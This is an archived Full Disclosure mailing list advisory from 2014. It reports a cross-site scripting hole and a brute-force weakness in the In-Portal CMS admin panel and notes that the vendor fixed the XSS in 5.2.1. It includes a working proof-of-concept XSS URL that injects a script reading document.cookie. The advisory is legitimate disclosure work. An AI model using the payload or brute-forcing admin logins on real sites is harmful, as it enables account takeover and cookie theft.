Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Vulnerabilities in In-Portal CMS

From: "MustLive" <mustlive () websecurity com ua>
Date: Tue, 16 Sep 2014 00:55:43 +0300
Hello list!
These are Cross-Site Scripting and Brute Force vulnerabilities in In-Portal CMS. 

-------------------------
Affected products:
-------------------------

Vulnerable are In-Portal CMS 5.2.0 and previous versions.
In version In-Portal CMS 5.2.1 at 31.08.2014 developers fixed XSS vulnerability after my warning. But didn't fix BF, only gave recommendations about protection against these attacks (it's their solution). They recommend for users of the system to limit access to admin panel by IP. 

-------------------------
Affected vendors:
-------------------------

In-Portal
http://in-portal.com

----------
Details:
----------

Cross-Site Scripting (WASC-08):

http://site/admin/index.php?env=-login:m0--1--s-&next_template=%22%3E%3Cbody%20onload=alert(document.cookie)%3E

Brute Force (WASC-11):

http://site/admin/index.php
I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/7276/). 

Best wishes & regards,
Eugene Dokukin aka MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Previous By Date Next
Previous By Thread Next

Current thread: